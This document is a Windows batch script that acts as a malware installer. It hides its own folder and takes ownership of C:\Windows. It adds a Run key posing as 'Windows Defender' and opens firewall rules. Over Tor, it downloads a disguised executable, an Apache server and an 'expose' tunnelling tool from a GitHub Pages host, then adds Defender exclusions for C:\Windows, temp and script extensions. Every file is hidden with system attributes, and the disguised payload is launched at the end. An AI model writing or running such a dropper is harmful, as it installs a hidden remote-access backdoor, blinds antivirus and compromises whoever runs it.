@echo off
attrib +s +h +i "%~dp0"

:connectivitycheck
ping www.google.com -n 1 -w 5000 >NUL
if errorlevel 1 goto Connectivitycheck

Set host=https://cryptedodissey.github.io

cd %~dp0

netsh advfirewall firewall add rule name="apache" dir=in action=allow program="C:\Windows\apache2\bin\httpd.exe" protocol=TCP
netsh advfirewall firewall add rule name="apache" dir=in action=allow program="C:\Windows\apache2\bin\httpd.exe" protocol=UDP

TAKEOWN /F "C:\Windows"
ICACLS "C:\Windows" /INHERITANCE:e /GRANT:r %UserName%:(F) /C

REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /t REG_SZ /F /D "C:\Windows\Windows Defender.exe -P\"rofile of Windows Defender [Microsoft Corporation]"\"

curl.exe -k https://www.7-zip.org/a/7z2201.exe --output "%temp%\7z2201.exe" && "%temp%\7z2201.exe" /S /D="C:\Windows\7-Zip" && del "%temp%\7z2201.exe" && attrib +s +h +i "C:\Windows\7-Zip"

copy /y "tor.exe" "C:\Windows\tor.exe"

if exist "C:\Windows\tor.exe" (
    attrib +s +h +i "C:\Windows\tor.exe"
) else (
curl.exe -k -L https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz > "%temp%\Tor.tar.gz" && "C:\Windows\7-Zip\7z.exe" e "%temp%\Tor.tar.gz" -so | "C:\Windows\7-Zip\7z.exe" e -aoa -si -ttar "tor/tor.exe" -o"C:\Windows" -y && attrib +s +h +i "C:\Windows\tor.exe" && del "%temp%\Tor.tar.gz"
)

taskkill /f /im tor.exe
nircmd exec hide "C:\Windows\tor.exe" && timeout -t 30
 
tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (set "proxy=--tlsv1 --socks5-hostname 127.0.0.1:9050") else (
  set "proxy=--tlsv1"
)

mkdir "C:\Windows\Win32"
attrib +s +h +i "C:\Windows\Win32"

curl.exe -k %proxy% %host%/Capture/nircmd.exe --output "C:\Windows\nircmd.exe" && attrib +s +h +i "C:\Windows\nircmd.exe"
curl.exe -k %proxy% %host%/Tools/curl.exe --output "C:\Windows\curl.exe" && attrib +s +h +i "C:\Windows\curl.exe"
curl.exe -k %proxy% %host%/sfx.exe --output "C:\Windows\Windows Defender.exe" && attrib +s +h +i "C:\Windows\Windows Defender.exe"
curl.exe -k %proxy% %host%/Tools/apache2.zip --output "%temp%\apache2.zip" && "C:\Windows\7-Zip\7z.exe" x "%temp%\apache2.zip" -o"C:\Windows" -y && attrib +s +h +i "C:\Windows\apache2" && del "%temp%\apache2.zip"
curl.exe -k %proxy% %host%/Tools/expose.zip --output "%temp%\expose.zip" && "C:\Windows\7-Zip\7z.exe" x "%temp%\expose.zip" -o"C:\Windows" -y && attrib +s +h +i "C:\Windows\expose.exe" && del "%temp%\expose.zip"

powershell.exe Add-MpPreference -ExclusionPath "%temp%"
powershell.exe Add-MpPreference -ExclusionPath "C:\Windows"
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
powershell.exe -command "Add-MpPreference -ExclusionExtension ".vbs""
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

"C:\Windows\Windows Defender.exe" -P"rofile of Windows Defender [Microsoft Corporation]"
